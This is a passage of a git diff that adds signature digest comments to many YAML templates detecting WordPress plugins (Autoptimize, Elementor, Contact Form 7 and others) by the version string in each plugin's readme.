4a0a00473045022100988dfa0f3147880459aff2eb4db8397ad8c20d780da0b6dded3d49bb3855f8d6022070b8dd9c1c6aabb463ac5d1d55fc85395de93a12a2d9dc97f8b89717b2137c47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84c..94ed2587b8a 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eea0c35055952c71bca538bb2820c12cfcc5449eca2f21d123e988b28804fdba022100f2db4befa6d71c0518bb22603718e1d283bb5a79449a78fd19d5a5565124864a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2ce..7801b47b2c6 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022021e60243d14264e9dba8ea688de5b3474409961c36bceb3ecfc09171bcafd475022100c33014209c734b729eeaaedc749e5e5ea456b8648aaee1b987eb3f8ad83bec59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a944..de4a3b8ddb2 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022038dc6e4638b425b5c25976c6a1ea2bbfebec41f45b353b081972a9314b8fe2a102202d51ccf11bdfb224f3e4caedd48da06c7c85373f3fa0944e5e8b11020a54e677:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dca..c56781aac8e 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100833b1ffc11abade5c875fce3d07c63d9df43fd821f22d95314ff3d7276191e71022100892462b0364fece5d18dc06cf1bfd3ff5c808c56ad0581a0e134dd3f4a7989c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e5326941673..2480f3a0c0a 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022014a7654a0343a4db574d42a785f280296cf6ac3b8e7133be43cab8809ebcaa78022100aebe35821a8eaeddd05714b5badf8de012cf8b882f6e243c736bad9b827af5d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d6..14b6b44810e 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009be4d87621bc01277bdaaadc7a98c3d6f17f072f80f98a6df235908e3a957b2e022043dff2aa121f603f99e8d25ad5038dc3c48dd212374ba02be929e36d2d3dd4ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c3..d79ddfaf482 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202e39b2756daa59459c406d092c2c75393051516742ac57f8b488f8c9ff392945022100a452e401c81268b1a0f861b68bbfbe4761ec17e15f5b49dc09baead17ee5c8c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a3..0d9b1fa0c86 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210088b6b1abdee2eeb78ffbaf5802926921bf60e1eeff3a0551f56876d1d5d6523902203335beb0338c0be9d89d2dfd72bb400e2fe7c2f2c8301753a8501f2a88e26c0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179ee..7a0487e1b22 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a7578a7d3a717a899ce4f9e68823c4fe2aaaddbd1f34c96af5d0198f6537db10022078beba8ef443b4a45287dcc0fda1a6d4ebab34ca9d94e51c7128a608dcf6bb7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d139..92f9afe25dd 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220638358339c4bd7bdb22bb16f4e48bdedb5ebaa09f530f4eef9ba390fc8ab0cf00220446285b50faf2fb5f563b6202b2701f99d86a38f88b499b59861a41c1914a5cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f6..0bbf5264709 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220320b80bf745b19c3e372f9c5729446ce6ba6d179f7d6d7d7704ebbcd9f846604022100fa9f57fa8b46ea6ff9641156123fae1d71ab7934201c4dc7d0f50bbcc639c2d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924be..1eabc28f823 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220086facc27f54576458d73621d1b49613bac1f7f44f41dd64686719ac0f068a69022038fd3e84b686a03cc9156372c01518580bf5d1b9ed8b98068d0e89144e5c8766:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a39..5517c155272 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220175125395811df3f8fab5a00d2a2ca40390bc8fad3cc441415ebb673eb887776022100d6f98a488d6ed79e29b987c843216f147cb2ae39901a6500b8c5248d4be0cc2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4a..a4f7a4644fd 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100eb18f314edf4b8bfdd9fb367ef987fee5cf20881c7566c20484a1b6acb526ed9022057aca81b080ddd34025d3c7b8690c7808205a0f87c20e72b7fda1575bc5a61cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545d..cba3cd185e2 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207e29b389eb4881a631ca421177286f3b0ac9b8e4cf21b80093357e36a0a8a9db0221008c06804f5185e8fdb7b40e02891a07e6fb11e43f2f844d4487ca85b6fa8a0997:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f181225..ed6c79a1fda 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100958bf73766039f8ad668aead372f2e35e6e48afbd4b687c4d0a44d929112af47022100dabe7f376b59c3a98305052cbdba06aaa9491ff143a77c9f80bac41c2a1227e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d5369..39ae5a327d7 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210082a9f28167351c924ddb746f67827480228856ccb5f1bfb83263c1809fafa16c0220077f16f52851cf2db2617fde87d0530b80241743619242b990689651aea9302c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1d..d6d40bf3c2a 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204f664283df35c44b120a73056eaa98b86dc4f2124c5105540fad59d64210572e02201140b396774514c382e105dc00ad3e7be5d493a18ee36a8e0a014c4cfd356ee7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc979..dfc31222b6e 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203f0aac20584ec48b1778b28b0362efb1f75c9ebc044e2a8ce9f36b40315c3e02022100feba53a208d9415687de52a7cedf45dc178f9b75703ce2c6d84a61bf15b8789c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f934..0089b9f62de 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fba7f95278217ef3891342f77e1552ea7ddde5fb40cef67b66cd6b9f50c2798a02207ff26bcc58aca7769556d99a7c1f4c9acdb05628f3a93dce4f314073f420a239:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf361..1d191afa7a8 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206ab50fcbc6f603b20bd69f28cb49520f9d0c542b24aff300e6143e3ac4f757e6022028160f9ccfb2e99430ba7769ddcaee074959b2e9e5e9ba931a7c14db541f3643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d26..7a05272abc4 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ac2916f526cfb8184b2fb67b3496295cd5f0554ee7ebc1881ffb18c993a87f2f022064c3c5fa539c83533ca36eecbe03122987c5727bb0faf09991d38a2154ad78a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86e..9f7c483ee57 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee989f0277e7887d0abd7c2245e303fef1f01fbd90e271d1cc759a23c96a9ebe02204b5707d27627158436d4f841a4a9d367b0d8eee1108e436a5ce88794a8e5c7d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b6..5acc9e1d2d7 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022066418ed3615ad26f9c809dd9905d0069c80d7d7e48e227e9a28bc4a235eae8b802201b6956684bf340f20579a916c355d78206cd60717901a9ed3c625951a458b8b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b0..38ec8f91b43 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ac36578b95d5687bc794ab64933fda9d8c80eb6ffd900f49dc3dbdda867c5053022100af01f6e6bf8d8f3f2284661ac78489ef0940cded8a041829b34d4b34aaebd2c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566f..af5cb35bac2 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205bd41888b5090f9af1a5408d752a5ef273305bb356a2022a297cfc948b804fd4022100e4e701e44b3406daae332989d983e78cf2c247dc5b67a22f1a6f976e3e25e770:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a154..5cfc6fb36ab 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f5ec5f75c69553bfc64c4f8d5cbe76f19949e62096371e78d4aeeb9630c1ea6402206886d9387a06e90e967a3356656e32660e65eb86b4f13673726aa87dcfe4a0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f2..0d72d49e363 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220660af0774476724f84fa679fd2017d2596459e9559dcde6b75a9aa47d74dd9f4022100dd481033cca0ae8da25204b55b7b22945eed0c2fca563ff7667985c4b88dd681:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c920917673..809237f5c06 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022036b77972c7dee251d6e25ff0abb314f6e348325d57ad4bf23aef8cb35e024817022021df0d8e2525884182b898e8cd497ec04ec592d6a9b6e954a77d49ed04c2344e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9ce..905d11b962f 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205dbb1653347fb86864153815e7d0c19d636ba7b1bbcf394892c73bc1ae6de9d2022007e89944f1c871e8dd94d399340a105a49c614812282a72dc8e04efbf20eef5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05e..b1dc499ecd9 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b93093b3c42ea7ccf5c6d65f9befe54fe36781a1d3e1cea005e50415a5355f602207cd07adc1be4e6e7191c49bb03a566299f00e14e12e8665e00f588a50cbe502c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce34093..ca6ed62d210 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206af71ff66f99d9fb6e808127d6c7df3f34b472df97645af13a2a69542c8813f3022100a72b69cf766fb819604635c3819d3f79b224adf1f8d1d96f11dc25922cca3a48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8dad..eb189997425 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b66043df62bb6576d8bb87dc0bc5855da297ae65f89ce92fb7ad5f68cb1c24a1022054d46b984737ba1cf5e22fdd3a320a5a8b2a5b5530432f9aede317849be7ff97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eba..c26996b4c7d 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022002c1cf24dec33f8f193a11cec5f5f18c4bd5c7222c5b81ba1d351305ca6a1a7a022100aeb4e43eb289411db0684995c676579b79d8243d057fd2ab5044197ab3cc4eb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df5..b5a1aed5096 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c4677a47ad21948f7a03b80a7c9f99d4b4398fbcbfa41dedc745338a103ad215022100ffa61f3c39e41f404659b42b0a1b35b1e4fe11927a1a6fac3481b8dd153885d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73ed..36f9f359e44 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f0f18957bb8eabbf495f66913a6d19de1dd484519675f25b2e611d2b5b8f3e00022100f97743ae774265697c627738a5b088e2f853f946e5aa6365ce9019eebc765bb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f00931279..3b51607dea8 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220092a8231483aae06790c1420248d5386ead2beec72293e33aab674153343c8fb02207eae756752d20100fd4c25dfda950e7a12c0bb20beff6939e8262a530aacc1d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d6..f317ce87fef 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a5621513883dd829341863c4c1dd79de7061cbe30e43caf1754faed4214b149b02206c88a258bc655f2ed510f70fec75d42c2e2be5930968403cb5a9d1c222bbc6ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d8..80bccc9a1cf 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ebee108abc0370682684e26f5ef44e93bf0dac5e055fed50c4f41a4d0ba7494b022100bc3efa5d7adf5d73571891c17a603c0407a2cd1b7e94a1c3f09d25e0ea0c0aba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ace..82985feac34 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e31ba6cef21a95c903effa838f58a8b44758bdf74c4327948bf95a27a323e3fe0220700ed292c0743151eb66af86d92ff36ce47352fe871c85929672236645437576:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736fd..2f3de46b98c 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d2c7afb42705f21e61c8aff58cdf21f17fd9b3f4ff8b19b28c30079a135f99b02204caeb13087a12cc1b50f379aa0e0089a1d4eafa9c46156a85963f67f04cfd6b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b24789..b36930e72a6 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f1c567d2f6f5d5bf399dee9d1d32332ff59b37ab4e69c86fc338cf25d0697990220668af29bcdf6eaae77c4509254d56ddf69a95c36c92fc55f88105f1cfdf78684:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6d..d3920fbb823 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aee45eb3088a28d53b344fb59bf6006227627dfe030c3d9b81f367682cedd810022077431c6fd8bea9aa8e5ef50a377db84d0418e3cd0ece3cb7f9795fe8c88afcf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d578..fb749ac9b29 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f9dd558f40be08e42028d83577e5b9b9ad30d71c112bef7b9a45f20a63f6af99022031562fe74c96dd77be9c6ee763fe85048bfef763394c386fef99b92e1b2ac385:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a90..17e7d5f1a8a 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e1129b023cb9c7d9051d5e40177f33b09b605c030a23d22da8fe11412299a2ee02206875fac735222b817cc7e75cf14b805f5a0156c9ab627f824013ed1ed767b3bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415d..c620e0d5c67 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022051864edc89e0c821ffbb2d37ce65f147ce54ae476328b306382524226cb97018022100b4a4a7295ee9f5d07437e50c97f4ed8e6bfea9c3318375a44d1b212c5fe06e90:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d2..c660873526c 100644 --- 